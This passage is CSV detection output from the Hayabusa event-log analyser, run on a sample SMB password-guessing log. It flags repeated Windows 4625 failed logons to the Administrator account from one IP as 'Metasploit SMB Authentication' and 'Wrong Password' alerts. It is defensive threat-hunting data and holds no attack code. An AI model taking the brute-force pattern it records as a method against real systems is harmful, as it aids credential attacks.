NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
